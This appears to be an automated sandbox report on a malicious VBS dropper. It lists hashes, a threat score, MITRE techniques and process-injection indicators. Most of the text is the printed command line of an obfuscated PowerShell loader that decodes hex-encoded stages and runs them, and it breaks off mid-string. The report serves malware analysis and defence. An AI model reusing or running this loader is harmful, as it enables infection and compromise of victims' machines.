c0f447441f61077cf779e8d0d17bf67c426108a8380e8afeec2aa28d4add28c2

Analysis

max time kernel
144s
max time network
127s
platform
windows10-2004_x64
resource
win10v2004-20220812-en
resource tags

arch:x64arch:x86image:win10v2004-20220812-enlocale:en-usos:windows10-2004-x64system
submitted
14/02/2023, 08:28

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

acz_ord_conf.vbs
Size

496KB
MD5

c6e89de0c4c622bbdb6eb63c3912c722
SHA1

8075ca67e3808fca03fd527f87788256e8b5beea
SHA256

c0f447441f61077cf779e8d0d17bf67c426108a8380e8afeec2aa28d4add28c2
SHA512

f574e6085ea512451c9426abb44b96edb7088fa7e7846f7af5a4f3bb093570abf704a1082628bb89beec9bb971d167f50816a64cf2f2c951594e2e00748e7c74
SSDEEP

6144:V81GjOwC6/99AEcYFEHxUZTS1HN2Oow9OffnLlmSZvIpHgZQ7nD258so2eCQPYoe:EoTc/ACN5owIffnLoH3nCiso8cK

Score

8^/10

Malware Config

Signatures

Blocklisted process makes network request 1 IoCs

flow	pid	Process
5	3448	WScript.exe

Checks computer location settings 2 TTPs 1 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000\Control Panel\International\Geo\Nation	WScript.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082

Suspicious behavior: EnumeratesProcesses 6 IoCs

pid	Process
2304	powershell.exe
2304	powershell.exe
4384	powershell.exe
4384	powershell.exe
4840	powershell.exe
4840	powershell.exe

Suspicious use of AdjustPrivilegeToken 3 IoCs

description	pid	Process
Token: SeDebugPrivilege	2304	powershell.exe
Token: SeDebugPrivilege	4384	powershell.exe
Token: SeDebugPrivilege	4840	powershell.exe

Suspicious use of WriteProcessMemory 8 IoCs

description	pid	Process	procid_target
PID 3448 wrote to memory of 2304	3448	WScript.exe	81
PID 3448 wrote to memory of 2304	3448	WScript.exe	81
PID 2304 wrote to memory of 4384	2304	powershell.exe	83
PID 2304 wrote to memory of 4384	2304	powershell.exe	83
PID 2304 wrote to memory of 4384	2304	powershell.exe	83
PID 4384 wrote to memory of 4840	4384	powershell.exe	85
PID 4384 wrote to memory of 4840	4384	powershell.exe	85
PID 4384 wrote to memory of 4840	4384	powershell.exe	85

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\acz_ord_conf.vbs"
1⤵
- Blocklisted process makes network request
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:3448
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$perceptionism = """OnFSkuOpnFacRetTjiBaoSknGr UnHovTArBBl Er{Fo Sp Su Ba NepDiaOurDeadrmBe(Le[EnSSetRerGlikenYdgTr]An`$OlPRalBeaRosSatBaiAlcTv)Sv;Un Re Te Pa Ex`$enSUdaPacfiklasCi Th=Re SkNGueMawNi-AlOSmbTijDaeBrcPrtAn BebgayBetquePe[mo]No Kr(St`$PsPMilUnaBrsIltSwibycKo.miLCaeFonangDrtAihMe Le/ch po2Me)Sa;Bo St Ki Do DoFSioSarAk(Ud`$PoSSueFrmDyiVibRalVaathsHopRehSteOrmMeoUduLisse=ro0Be;Mo Ej`$svSAmeElmDiiSpbSolPraGosErpQuhMeeComBooPauLasIn Se-KelTotMe St`$ExPPalmuakasfatOviUlcGe.DoLHaeTonmagVrtExhHe;Pi Mo`$baScoeInmMiiArbBilMoaAgsRupSthFaeComEsounuVisBo+Fo=In2Pa)Ca{So Sa Pi Re Pa As Re Sp pe`$SnSIdaFicDekArsRr[An`$HoSFleShminiNobDclBaaVesImpSuhSkeBrmKloAnuSlsMa/un2St]Pl Sm=Ox Pr[CacVeoBenamvNreOprDitVi]Ka:Ka:SpTUnoprBVayFitNoePo(Th`$biPlolTaaPesortAliCocCa.PeSStuTabSisSttTrrJeiErnAfgLn(Ko`$ThSBleUnmUniDebKllDiaErsGnpRahStefrmAnoKluDisLi,Ha Fo2Hy)Re,Ha Ti1Un6Al)Re;La Bu Ex`$TaSDaaHocStkStsCa[Ko`$ReSLuehumDkiSobHalEnaRasPrpAthAneEmmInoAnuFosGu/Un2Da]ph Lo=Sp Co(Li`$FjSPaaUncArkStsPr[Af`$DeSOveCymDriTibUdlOuaTesSepTihexestmBeoPruOvsFo/Pr2Ko]Pr Kr-BibGyxZooEvrtr Co1Me7No2gl)Ve;Ta Co Sk ra Al}me Mn[BoSSmtBrrKaiYmnFigDe]De[FaSheySusGotcaeOrmPo.PsTPreSyxHetOv.NoEYenPrcAtosldAsiGrnPhgSj]Sk:Fy:AfADeSTiCMoIDaISm.ArGMieAltFlSCytBarBeiUnnArgKr(re`$OlSLaaBrcPrkAbsPl)Fr;Ov}Ca`$DmSSokSuuAdltieGunDadSaeSj0Si=seHBeTreBCy Ap'SkFChFTrDEa5NoDEtFUnDRa8ViCTo9MiCTr1bl8Pr2PaCPo8PaCDa0DoCGa0Le'Ko;An`$MeSStkFruKulPoeAanEqdSveMo1Fe=LyHKiTMiBSt Bi'WhEmi1UnCDo5PhCTeFKeDWuEStCin3GrDudFHeCfi3PiCBeAlaDSp8Mi8En2OrFPrBGlCSu5CaCKo2An9CrFCa9amEMr8an2TrFDo9AlCKo2BeDUnFRmCReDStCcyAStCAd9PrETh2RaCKoDKaDCr8UpCDi5CoDUnACoCBa9HyEbe1UnCne9PaDAb8DeCPa4UdCVa3WaCAn8EtDBrFBe'Ha;In`$HoSFlkInuInlCheLanSadQueGp2St=BaHMiTTiBKo Gi'PiEBuBUrCPr9HeDFo8GeFPyCNeDNaEAcCBu3EkCStFCrESiDFoCRu8KfCKr8FlDInEDoCMi9KoDViFHjDkiFNa'To;Pr`$HaSWokHouKvlUdeAnnOrdIneSe3no=SaHhoTJoBCi Be'UdFWiFNoDVi5spDDoFBuDKa8faCTe9CaCPa1Ru8Is2KoFUaEBrDIn9FiCTi2AfDmo8MeCVe5StCAf1PeCGs9Pa8Il2DaEBi5EsCBo2BiDDi8AnCBa9GoDJoEPhCSy3FoDKoCLoFMaFCaCNu9UdDOpEdoDQuAzoCHa5ReCToFNoCGd9ShDruFMa8in2MeESo4GaCTjDErCfr2siCTv8BaCRu0HyCFl9OvFBaEAnCPy9SqCThACo'Ti;Co`$KaSAfkEgusklSkeBinsidTreDg4mi=sjHKaTJuBTo Ca'KvDFiFDeDgr8MoDMaEFoCSt5NoCou2PrCKrBsw'Jo;Pe`$DeSGakHauSklAleNinMidUnePh5In=AbHOvTUnBPn Ni'SeEBaBReCMe9VaDFo8FoEAr1InCSm3PrCCh8RyDMo9SeCPf0GlCDi9ObEEd4FaCExDPoCPa2CaCCo8UdCTr0HuCDa9Ec'Va;Pa`$UrSNokPeuBelBeeSpnIldcoeRo6Ma=PlHSlTHyBBr Ge'PaFQuEAsFPe8MiFFiFUpDMaCBeCWa9LuCLaFSnCDe5AmCIaDCeCNa0DyEad2PrCBiDprCAf1WhCCo9Ov8Ri0En8FaCmaEfi4TeCSl5UrCTy8UnCSt9KaEBlESpDan5ChFStFFnCMi5OuCSlBAc8Sp0Ev8DeCOrFUnCCoDRu9EfCNiEThCDa0FyCne5BeCRoFDi'Se;Cl`$NoSKokgauvalReeBlnScdVaeDi7Ky=SpHExTSiBud Pi'SuFChEGoDSe9trCPa2PtDJo8ArCUd5LjCOr1SkCAn9In8Ad0Dr8SeCDeEas1PaCPrDReCUn2SuCAfDKiCKaBCeCYp9MiCUn8Bo'de;Ty`$tiSPlkLauRylPeePonFrdOpeEn8Ud=BiHTrTSaBOu Ma'MiFWeELaCPa9ByCGoATeCGl0KnCSk9PoCByFSyDRv8PrCFo9LgCka8NaEfa8LaCDa9KrCNo0KaCEx9SpCLoBTrCMuDBeDOr8MeCLu9Fe'An;So`$BaSMikShuMylKieDdnTadJoeTy9So=NoHmeTMiBun Ch'TrESl5PoCHa2PrEAc1taCPh9DrCVa1NaCBa3KaDFaEteDGr5BiEIn1paCTe3frCHy8saDFi9FoCPa0CoCSt9dr'Ma;Co`$ReDDiaPrtBeaHyoCapAtsNaaVumBelFaiLsnMugLosTosFlyOvsOrtGaeNomExeStrUnnImeZesAf0di=AfHBoTStBHd un'laEOp1ArDSf5PaEHe8ScCAu9PlCun0FoCMe9ChCQuBPrCSeDviDTr8EmCes9joFSl8HaDAf5DiDLrCMaCAc9Ma'Co;An`$reDtrabetAbaBeoBopHasDiaDrmRelCoiFlnIrgPssNesSkyBasHutAneStmIneVirEnnBreHysCh1Po=TaHFlTAfBOp Ti'HvEWaFHaCCh0PoCKoDQuDOuFDuDByFEx8Re0Af8PaCElFneCHoDDi9AfCAfEUdCSy0TaCPe5CoCliFhv8Br0Sk8EkCLeFDeFFlCPs9UnCSaDFrCCh0LuCLo9ReCMa8Ve8Gi0Co8ViCBaEDuDstCAn2SvDLoFYeCMa5NoEplFStCFo0BuCInDEuDPrFStDLeFga8Di0Ko8SyCSnEHyDkuDHy9SaDUn8ElCMa3SuEBeFKoCCs0OaCSuDMiDCrFCoDStFIn'So;Ko`$KoDFeaeutKaaGsosppTosQuaTrmGelhaiBenZegDesRostrycesDrtPaeSemCaeSkrGanSceAfsWi2Or=PuHGeTGrBWa ou'EuECy5AnCTr2BaDStADaCaf3SuCAw7SoCOp9Fo'Ek;Si`$puDTiaTetVraFaoAcpFosTraMimIdlTiiKlnLigMesBrsLiyTusUntReeTrmTieObrUnnWieMisPo3Te=PaHSuTStBIc Ra'ChFFiCerDBe9UnCEnEdoCAf0BrCAv5naCBrFRi8Gi0Dy8HaCboEIn4LoCPj5boCNe8PlCCo9AfEMeECoDcr5PaFreFRiCBe5ReCIgBMo8Dr0Sl8EmCdaEHe2OdCCo9SaDInBTaFCiFcoCGo0DiCKu3yaDGa8Bl8Ti0Te8ReCOmFsuAAuCAm5ShDFiEFrDBy8OpDPu9MaCDrDChCHu0St'Tr;re`$AlDOnaAftVeafooTrpMesNaaPrmPolscifonNagInsAcsSayKlsIntPheOkmHaeEkrasnReeTrsNo4Ak=SlHShTBeBVa No'BrFStATrCRu5TaDTrEkrDco8BoDFa9CoCZiDFrCAc0KuENoDJoCGa0SkCEr0ShCSk3ReCEtFSu'An;El`$StDLaaPotTjaUnoInpFjsUpabimLglFuifunregDesDisLuyTrsVitameDumSteNorGanPueYosAs5Si=JuHKoTFoBIn Ro'KoCKe2urDTi8SkCYa8kaCOv0RhCSk0Tr'Mi;So`$AuDReaTetGaaSkoSipKasSkaDumHolCoiSpnUpgSisFrsAtyhesChtDieGumFoeDurSanCoeHusge6De=ReHAkTKrBRe Fo'StEFo2ReDBa8ToFMyCLuDMyEAnCCa3ArDAr8JoCLe9ReCImFDkDVi8ChFCeAUnCHu5SiDAuEPaDBr8arDKb9ViCSnDSkCAt0TrEVa1PrCSt9KiCHa1GoCSt3ChDCoEFeDSp5No'ha;Di`$SlDFaaBetDiaIdoKlpresLyaInmNolStiflnVagVosKusAryResWhtFleSlmGeeAcrAsnHoeSysVr7Si=ReHBaTOvBFo ar'MaEPe5AsELa9LaFIg4Fo'Ko;Un`$TyDHyaHetInaStostpNosJaaBamrelMeiMunAigChsExsBiyRasDutaneBomAfeMirSinSteTesFe8By=FlHPeTBoBJa In'beFBa0Ga'Se;Do`$BeSKvaChnTydTiaFrlHe=diHBeTTrBOp Co'ElFAa9EsFCeFMeEUn9SuFFoEep9OpFZo9AnEBa'Gi;Id`$CoFExiFrsrkkCaeShsIntAunStgAfeOprSknkoeSk=foHFrTdeBBy ta'UnEAlFGrCocDWaCSp0PhCBl0FaFDeBUdCmr5reCAr2LaCvi8NiCdk3BrDDrBHeFKoCUnDKlEOmCOb3EpCElFGrEGeDTh'Ce;DifUsuKanMachitbiiChoOlnbi UdfPakSypFr sk{ClPStaParDoaSpmAc La(To`$EnBTieGevIciSplSkgSueKenAtdHaeBl,Un Fr`$TmHmooClrTarOvoEkrMaiUnsreeBi)Ch Pr Da Al re Ha;Ps`$FlOHecsehde2Mb0Ac6Hi0Tr Ly=UnHekTSiBSu Di'Sa8Va8BdFLy9FeCae2UnCSy8obCLi9JaDSwEPaDCaFNuDBr8BeDBl8UnDWi8PrCAm9FaCRo0ChDPrFReCBe9SlDKrFOpCElAToCUn3ToCPa2AfCSp8GaCaw9ImDSpFSv8OvCSn9Sv1sn8PtCKn8Re4MaFAf7FyELiDfoDSkCOvDSlCDkEBl8ArCIn3BoCMo1TeCGoDlaCPe5MaCCe2GrFUn1Sh9Da6Vi9No6SaETaFSpDVa9NoDShEApDJaEBeCTo9DaCAf2LiDSt8thERa8MaCSu3SvCBl1VaCUnDSpCAn5OvCFl2Ko8Ns2FiEBeBUnCPo9KrDSn8OrEstDErDBoFfrDKlFChCBu9KaCIn1OpCNeEOrCca0afCHe5DiCis9CiDDuFPr8Re4In8Es5Ar8maCreDSe0Ma8OvCRaFBlBStCIs4TiCIn9EkDVaETeCBr9ka8Fi1FaEFi3opCPrELiCKo6omCKo9OuCAtFUnDKa8Lo8skCReDIr7Fo8MoCMe8Sp8drFov3Di8af2SkEOrBBjCGu0MaCBy3PrCUnECoCBoDNyCWh0AlEatDFeDEnFFeDPoFAnCKn9beCGa1AaCApEliCTu0BoDVe5TrEEsFPoCWeDudCGaFFlCUt4KaCMo9ef8FrCPr8Ko1FaERnDJaCUn2LaCWo8Ag8RoCVi8In8LiFDd3Sm8Mi2LuESe0CeCUn3PrCPrFVaCFaDMeDKm8poCUn5OrCUd3FoCDo2di8Sp2SpFVaFHiDKaCUsCSp0NeCRe5SeDSl8Na8As4Kr8Te8BaEAm8TyCAaDNoDVu8SvCOpDOmCPr3DiDTrCBeDFlFNdCReDAsCTa1InCFe0PeCFl5UrCOb2UnCMlBBlDurFbeDAcFNeDAr5HyDNoFOvDDi8PuCFo9UtCSj1ReCGu9AuDPaESnCAi2SvCFa9UnDMoFcy9Ar4Re8Su5slFGr7Ud8Ch1Ve9GeDNaFNo1Gr8Ar2EkEAl9BlDKoDueDAk9AgCGuDMoCAm0GrDAfFPy8Fi4Ar8Ep8MeFTrFZoCFr7BaDSt9StCHe0DiCHj9ReCUn2GrCTr8EtCSk9Un9FoCPa8An5Ph8LoCSuDDi1Sy8Ke5af8So2PiEEtBMoCKa9TiDVi8PuFUn8jaDpi5spDCuCprCVe9Pr8Un4Mu8El8InFFoFStCTh7UrDLo9UnCTr0GrCSi9AnCJa2unCRe8imCVe9ma9YoDMo8Fo5Hg'La;Re&An(Ma`$spDUvaditSpaunoAnpMasNiaPrmBulUniLynDigAlsPosWaymasPrtSkeMomDaekrrBenuneAusVe7St)Em St`$SpOSacBahDa2Ta0Av6Pr0Th;St`$ajONocPhhPo2Kn0Au6Ti5Ov Ka=Pr FaHmeTNjBSk Ro'Sp8Ve8biEskBArCLaDBeDBo9MuDMaFDiDBrFgaCDiAFoCFu5EvCOv0DiDLs8ReCSt9SuDInEAfCPaAPrDAu9ReCSp2TiCUd7ReDTa8LiCSt5SlCDe3TrCBe2FoCAf9EnCAf2Su8TtCIn9St1Un8BaCGa8Fa8HkFAn9MiCSk2VaCSa8gyCNi9AnDJaEInDMiFFeDsk8StDSk8arDPo8IlCfe9MoCLa0TaDTeFUnCCe9DiDExFSdCprAFoCSy3SnCJu2KnCNa8KiCca9UnDKoFSu8Af2ReESkBLdCRa9BeDSa8GrEmo1DuCSc9AfDWo8DeCAu4PaCSa3ViCTr8Ac8Hu4Aa8Gl8ChFPrFenCAd7SlDEj9VeCPo0FiCRe9GrCSk2HlCFa8AgCSe9Dr9viEKv8sc0My8MaCVeFSy7InFIn8ChDBl5UnDArCOuCSl9OmFEd7SuFPl1UnFCh1Sp8UpCUnEAlCDu8ti4Ov8Ne8DrFhoFPiCde7MeDDe9MoCYo0TaCSp9BuCAm2RaCIn8boCgi9Kr9DrFPh8Tu0Sy8GyCEk8Ge8MuFSnFfrCBo7HuDDi9ReCRe0MiCEc9BiCTo2ArCVa8ReCRd9Pe9sy8Si8So5Tr8Un5Tr'Bn;ce&Re(St`$SyDEtaSatFoaNeoOrpObsasaChmHolEiiSunFogMasHesMoyKmsAmtSpeInmTheForStnBreRnsFo7Ta)Se Un`$UnOLacSehCo2Ki0Al6Te5Un;Pr`$OpOAlcMohSl2Li0Sm6St1Ul Bi=Va InHooTGeBTe In'VaDadEReCBe9ReDSt8KuDCh9SmDNoEFrCMa2Ru8StCOv8Op8PrEOmBJaCKaDFlDFl9InDKaFOpDChFAsCBlABiCAa5ScCAa0FaDBe8JeCSa9UrDDaEAmCThAJgDCh9taCTe2JoCHa7KaDSq8TyCAf5AgCDe3SqCNs2TaCFo9SeCBy2sp8Ly2MoETr5SpCSk2ReDZoAAtCmo3KrCMo7voCGr9Ud8Ba4Hj8Bo8BeCPe2ExDFn9SoCOp0GrCPr0co8An0Ev8ReCGrESeCPe8Fa4MiFSc7RaFKoFStDXa5DeDSuFUnDQu8NaCDi9FlCMc1Pa8Co2FrFSkEInDMo9peCJo2JoDUn8SiCPu5trCUn1GrCJa9Ko8Up2CiEda5TeCDa2BlDRe8StCBa9WrDRaEUrCFa3PrDArCAtFStFPoCKa9UhDPrEReDWoAAnCSu5coCTrFKoCAr9SkDPhFKa8Jo2UdEBe4BaCUnDWoCAn2OcCUn8SpCIn0UdCpl9AnFSaEHrCPa9UnCDeAStFKa1Lk8Sa4SaEGa2PuCPr9ViDTrBOr8Co1SuEEn3OfCHuEAsCsu6PlCsi9HuCenFStDVe8Br8prCGiFRaFOpDRo5BeDPyFpoDHa8MuCKe9FrCPa1Br8Un2ReFSlESaDSk9GuCEl2viDKo8VaCSk5TiCKu1GaCDi9Au8Af2KsEKl5VaCEl2BeDLu8foCFo9UsDBuEFiCFo3AnDunCHeFPuFInCAn9OnDRoESkDVeASoCan5joCUnFPaCFa9SkDInFFa8Pa2FrEva4GrCOuDFeCSe2FiCFr8UnCDe0StCTr9kaFSlEKoCNd9VrCSiAGa8Kr4Ud8Br4FiERi2MoCFo9SvDroBSi8Bo1PeELe3EnCHyEStCTr6TaCMi9GaCStFOpDCu8Me8PuCEfEHo5FiCgo2RoDSu8VeFWaCklDUn8AlDUkEAf8Hi5Va8Ev0In8SkCFe8Ca4Ba8Go8UrFCh9DoCMa2SuCBl8MiCOc9VeDMoESaDPeFReDUf8ReDHu8MiDHj8SkCTi9MiCSp0hiDAlFSaCOf9SuDBrFSaCBlAFrCPe3ClCDo2CaCTi8HyCva9TeDHeFRe8Co2NoEAnBViCMi9asDNu8EvEPu1OhCEx9thDBe8CiCMa4KoCMy3SoCOl8Te8An4He8Vm8FoFEfFCoCUn7TrDAs9SeCBr0FoCDr9biCUb2SeCSu8PrCFa9Lk9Gu9Up8Be5Ps8Ph5Op8Af2WyEmu5FeCFa2paDImASmCTa3phCpr7UlCOc9in8Me4He8Fe8InCNo2InDFl9SeCAn0RuCWe0Po8Ce0Fr8BlCPiEToCLo8fu4Os8Bo8ReEUdEBrCAv9DeDUdAUdCUn5reCSp0SkCTaBStCLa9SoCBe2VaCAk8UnCKr9Al8Au5Pr8Co5Ov8et5Ab8St5As8Ri0Ro8SpCAc8Ad8AnEKo4UnCHj3AiDPaEAnDefEMiCKo3CoDBeEAkCCi5TuDStFEbCOv9As8Tu5Du8Un5Ma'Ca;Co&In(Co`$QuDPaacotYnaHooAnpOssCeaInmFalRhiStnHigSispysesyUnsEptSueInmDeeKnrStnByeGasUn7Le)Se Ko`$MaOAdcMihUn2Op0In6Hy1Be;Su}SvfPauDenKncCotSiiKhoKonGy maGViDLaTMi Su{caPpaakorDeaHumDi Da(Et[BePUnaThrBlaAlmDieSttEkeCarSi(OrPwioFosFoiUdtPaiZaobynIn Am=Bu Ka0Hj)ic]Ou Pl[brTCyySopBeeUn[Co]Ex]Re Do`$ReBunoFubNubprlvueRe,Ma[TiPPeaGurLaaOvmAleLitDieSprRd(SuPFroSpsImiAltSkiinoMdnMi Ge=Sk Ov1Mo)Ka]No Pa[ImTanyNipMieGu]Ud An`$MgPCooStlFoiCatKeiReaDenLimSkeLalfrdUnePalFosblegerGanPreFesNa ug=Ki Ra[FnVTaoLeiStdpr]Ef)br;Ko`$PlOGucSehny2Ad0Fi6My2St Ba=Sv MuHPrTBeBDe Ps'Ad8Ps8DrFBuFReCSu7RiCVa3AfDskCUnDIn9RiCCr8ClDUnFBiCAl9YaDAmEKaCPa9NaDSaFSp8HeCHo9Pa1Gr8DiCSiFAn7KrEGeDVaDbrCAsDReCGrEPh8StCDe3HyCSa1JuCbaDAnCEm5KiCPi2ObFVa1Ud9No6Ta9La6KaESiFReDDi9DeDInEFrDHiEWiCHe9StCWr2NoDKi8UnEDe8JeCHo3laCKv1CrCCaDMaCFl5QuCEr2No8Ti2EkESu8DiCTo9ShCCiAnoCDo5CiCRe2AnCud9TeERe8seDTr5KoCSt2teCUhDDoCGa1SeCCh5SaCSpFAnEMoDUnDAdFAnDRoFFaCIn9DiCme1UdCVeESeCNy0faDTo5An8ku4Ga8Cy4CrEFi2OpCCa9DiDPyBoz8In1RoESt3HvCLeELiCTs6CaCAm9SkCPuFPeDso8Gr8PrCTvFAfFBoDWa5BeDAmFEcDTr8HaCAs9CaCGo1Ki8In2skFVeETaCDu9AnCMeADiCne0MrCAa9CeCLuFFrDIn8GoCfo5ByCOl3DeCPr2As8Fo2UdETaDPrDPoFNoDLiFPoCSa9SoCUn1BiCAfECaCGa0LoDHj5SmETe2UnCAfDNeCAl1SpCTi9Fa8Sk4Tr8In8BrFBjFFiCCo7JoDOx9lyCPa0StCDu9PeCko2StCPo8spCCl9Me9Te4Ra8Sk5Ge8Gu5El8Pa0Sm8HlCDiFMe7AfFViFSaDSu5CoDKvFToDBe8InCAu9ChCma1Ti8Ga2PaFNiESuCSu9BuCfoAPrCSt0FrCCo9SuCFjFDaDLi8NoCKn5SoCGl3BiCDi2An8Sh2ReESi9poCDa1caCVi5keDLi8In8Ce2StEHaDPaDanFBrDOnFMiCLe9TrCAp1ChCPrEPhCRo0HeDEn5SkEPaETeDPe9JuCSi5MaCOr0BoCmi8TjCAf9FlDJoEPaETeDSpCKvFekCbiFHaCLe9SlDjkFCoDBrFFoFga1Mi9Li6Ed9De6etFMuEInDMi9ReCmy2Pl8Di5Em8Ko2ReECa8UfCCe9CeCTiAHjCMu5HaCdu2JeCVs9CoEKo8HeDRi5PaCur2ApCBlDGlCTi1OvCOp5AfCFuFVeEPa1AgCUn3ElCEc8MuDBi9PrCUn0XeCRu9As8Ha4pr8Po8TiFApFPlCMe7BeDPo9EnCUn0UnCJo9KaCSh2SyCPr8KaCIn9Sp9ma5rk8Un0El8GaCdi8ci8baCCyAkaCBeDShCGi0SmDTaFLoCga9Mi8Om5hy8Se2PaESk8PiCFl9HeCMaATaCPh5TrCOz2ArCUn9VaFIm8ErDRe5BeDRaCAcCEn9Re8Eu4af8Mu8frEBr8arCAsDSkDLa8GyCSlDGvCUn3NoDMaCWhDUnFLfCFaDpoCst1RuCEn0BiCGl5reCSt2BeCHaBSiDDeFsoDSlFPiDCo5SvDpaFFeDMe8SoCRi9UvCEk1DaCRa9DrDHeEKlCSu2SyCDa9BaDteFGa9BlCTe8Ve0Sy8coCKi8Ho8KaEtv8AfCMiDopDUl8UnCMuDneCIn3BiDCoCEmDElFStCAwDTaCPr1RoCCh0EvCPa5MoCsp2BeCTrBOdDSeFBeDMaFNoDKo5AdDFoFRiDAr8ToCTa9SkCSe1JuCsp9SpDdiETaCSp2RiCPr9KrDCuFAt9AlDNo8Ta0Va8quCLsFNo7ArFBlFBoDbe5OpDSpFBkDUe8SpCAl9SeCVi1Dy8Pr2inESo1FyDDo9OrCNi0ArDGa8ViCBe5DeCOvFbeCMaDFlDAsFPaDOl8MeEKr8DrCAl9HyCAd0TrCLn9OsCCaBBeCApDToDCo8BiCPe9FlFWi1bu8Bu5Se'Uo;Op&Sp(Bl`$KoDStaArtMeaReoSepsisDoaSwmPulCaiPrnGegHrsDasUdyStsuntSeeJamRoeDorBenLeeCosAl7St)Th Pa`$NoOKacFohKr2Sa0Cp6Re2Ro;Ey`$klOAtccihDe2Wh0Pe6in3Ge Sy=Po CyHAnTZiBAl Sa'kh8M 8FlFBaFUnCBi7TiCBi3BeDCiCHaDKl9SpCSh8CaDPrFUdCRo9koDUdEHeCdi9CoDDiFFa8Mu2MeEAd8OvCFr9AeCEtAUdCKa5HiCMo2StCSm9unEUnFElCFo3UdCAf2SkDOvFPeDDr8tiDDyEBoDRe9InCEkFUnDDe8AnCDe3F DGaEUn8Qu4ov8Or8SpFBeFSuCMo7ScDBl9StCSm0OkCCi9MiCKa2TrCVe8LaCTo9Le9EmASp8Kl0na8HyCUdFPl7CoFAcFCyDFi5HeDSeFKaDGu8PrCIc9FaCHo1Te8Ma2UdFVeEWeCPr9VeCSeASuCCr0RsCFa9PiCRyFSkDDo8CaCJi5ExCNe3PuCOu2Re8Ka2trEOrFSuCMaDOpCDi0VsCBe0SkCRe5FiCAl2DuCUnBVmEOvFGlCSk3TeCCo2ShDslABlCNi9ReCHv2AmDAk8AkCja5ZoCCy3SyCEp2TiDGiFunFKa1Au9sk6Ol9Af6KoFMeFPoDFo8EnCsoDruCKa2FaCEn8ekCSkDAfDSpEurCFe8Mu8Pi0Sk8PrCSl8Ta8ReEUdEFoCUd3coCDiEFiCTaEKlCFl0FrCCi9Bu8Ov5Be8Ga2FlFInFsaCsp9SyDSk8PrEAl5EuCav1PlDBuCBuCSl0FiCSy9OvCMo1EsCUn9paCLo2ArDKy8LaCSaDVaDAl8FrCre5GaCGi3StCWr2BlEHiAInCga0PrCtaDPuCspBSlDCaFSt8Gr4Sa8Ss8HjFUnFReCDa7FeDSt9klCSk0CyCGr9foCMi2MiCTo8UnCAm9Du9KbBUm8be5Ov'St;Mo&Ne(Pr`$StDagaCatUnaopoVvpMossaaQumTilKoihonPogPasTrsTjyGlsBrtJoePlmSnePcrJonNaePlsSa7Ac)Sl Me`$LiOStcAthUd2Se0Co6Ab3Ap;Ac`$TwORicEfhSu2Gr0Ek6Va4Th un=Ga UdHFrTLaBOb Ca'Pe8Re8TrFAiFPoCOv7MaCth3AnDAcCGoDNo9MoCUn8ChDHiFIdCRe9NoDTaEFoCMi9daDSpFHe8vi2UdEEp8RaCRe9YdCOlAWoCSe5BrCGi2StCSt9EfETu1InCOf9SaDTi8SuCFl4WaCSc3FoCSc8di8Fl4kl8Su8UdERi8OrCmaDMuDSp8SuCUdDCoCMa3TiDseCGoDSkFHaCRyDOuCPr1FaCWh0FeCAn5UnCSu2KoCToBCeDPlFSwDAlFKrDCu5SoDHiFNeDCh8ZoCFo9foCSe1PrCAf9AuDsyEreCRd2OfCfa9FiDKoFAf9ReELe8Re0Sk8PoCSi8Sy8PaEEr8LiCAnDTeDWa8SoCInDZeCVe3TiDSeCEuDLaFSaCUnDTiCSi1GeCVa0PhCAf5deCSo2smCTiBSnDSlFUlDFjFanDTu5HyDUnFKyDBe8UrCUn9AlCAf1DrCEn9RaDZoEkeCSt2ReCEx9kuDFeFTu9SiFIn8Ma0Be8JoCOx8Er8FrFNiCBrCLi3TeCSu0StCPu5VeDHe8BeCLo5HyCNeDShCBe2StCFa1HuCPy9PrCRh0laCIs8gaCLi9MuCTo0FaDCoFDiCSt9caDSvESkCSk2FaCSt9neDCiFfo8Op0Ge8PaCRa8Se8DiEFiEskCCl3EnCEvEPrCReEInCBe0FrCSk9In8Ot5Be8Ov2GeFudFAaCKo9HaDaa8CoEEf5DrCpr1ChDDlCdyCBr0asCPe9trCRe1KlCNo9InCSn2knDBo8SqCCoDReDEr8AdCBe5TeCPr3TuCDa2DdEUnAunCBr0AnCSpDThCMoBUnDRoFFo8Te4Pe8Br8CeFSuFHaCMi7LaDto9KsCAc0NoCUn9GrCCo2UdCEc8MuCPl9Af9ViBSu8Br5Co'Ov;Ga&Af(Cy`$ggDEgaSatIcaFroGrpAmsCoabimHalPaiTunRigMosLysAfyKasCatDeeDemIneLarSenKaeUgsIn7Ec)Sk In`$FoOHjcKrhbe2To0Sk6Re4Pa;Gu`$EkOTucHehSi2Se0et6Ar5As Kv=Sk KaHUnTGeBMi Ri'CaDGiEChCsa9EnDSa8ElDPs9PeDOvEunCCo2Pr8nuCKa8An8GaFYnFAnCNo7PrCIm3OvDAnCSkDMe9KoCAf8frDKeFSuCVo9PuDPaEFrCUn9ChDNoFTr8Ac2OpEToFUnDMpEEjCpr9BaCRaDGeDDe8BoCRe9UdFGu8SaDPr5UdDPiCCiCUn9An8Au4Sk8La5Ka'Fa;Da&ud(In`$OxDOvaFotPraBuoevpVasOpaPamWalTriErningSesDisOrythsHetAfeSumKaeterBanSheAishu7Gl)Ja To`$inOMecUrhUn2Pr0kf6La5di An an De;Sk}Mi`$SeKHeoRenTuvEpePrnBrtFoiupoScnEneUdrTenRaeKasDe Pe=In DeHPhTUnBTh Eg'DiCEf7EfCEl9StDBeENaCRe2WaCBl9PhCKv0ka9AtFsk9VrESi'Di;Tr`$BaOFocDahTe2Fo0Nu6Ko6As Fr=Ti SvHHeTFoBUn 